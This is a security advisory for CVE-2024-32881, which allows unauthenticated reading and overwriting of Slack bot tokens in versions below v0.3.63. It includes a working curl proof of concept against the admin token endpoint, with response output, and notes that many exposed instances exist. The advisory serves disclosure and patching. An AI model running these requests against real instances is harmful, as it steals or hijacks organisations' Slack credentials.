
Unauth GET/SET of Slack Bot Tokens

Critical
yuhongsun96 published GHSA-xr9w-3ggr-hr6j Apr 24, 2024

Package

No package listed

Affected versions

< v0.3.63

Patched versions

v0.3.63

Description

Summary

Unauth GET/SET of Slack Bot Tokens: anyone with network access to the instance can read the stored Slack bot tokens, and can also set them. This implies full compromise of the customer's Slack bot, leading to scary internal Slack access... 😓

FYI, many instances (quick Shodan scan) are already vulnerable to this

Details & PoC

alias crli='curl -sSkiL'
# 1. Unauthenticated read of the stored Slack tokens
crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
# 2. Unauthenticated overwrite of the tokens (no session, no admin check)
crli https://127.0.0.1/api/manage/admin/slack-bot/tokens -X PUT -H 'Content-Type: application/json' --data-binary '{"app_token": "aaaa", "bot_token": "aaaa"}'
# 3. Read again: the values written in step 2 come back
crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq

# Output of step 1 (before the PUT; no tokens configured yet):
# crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
# HTTP/2 404 
# date: Mon, 08 Apr 2024 10:34:16 GMT
# content-type: application/json
# content-length: 28
# server: istio-envoy
# x-envoy-upstream-service-time: 3
# 
# {
#   "detail": "No tokens found"
# }

# Output of step 3 (after the PUT; the attacker-supplied values are returned):
# crli https://127.0.0.1/api/manage/admin/slack-bot/tokens | jq
# HTTP/2 200 
# date: Mon, 08 Apr 2024 10:34:18 GMT
# content-type: application/json
# content-length: 39
# server: istio-envoy
# x-envoy-upstream-service-time: 5
# 
# {
#   "bot_token": "aaaa",
#   "app_token": "aaaa"
# }

Impact

"Pretty big impact" aka "Slack access from WWW" aka "We're f*ed!"

Note

I checked and it seems that there's no path from ARBITRARY TOKENS SET to ADMIN XSS, which is nice as there are way more critical issues in the admin side, more on this in the next issue!

Have a nice day! 🌹

Severity

Critical

CVE ID

CVE-2024-32881

Weaknesses

No CWEs

Credits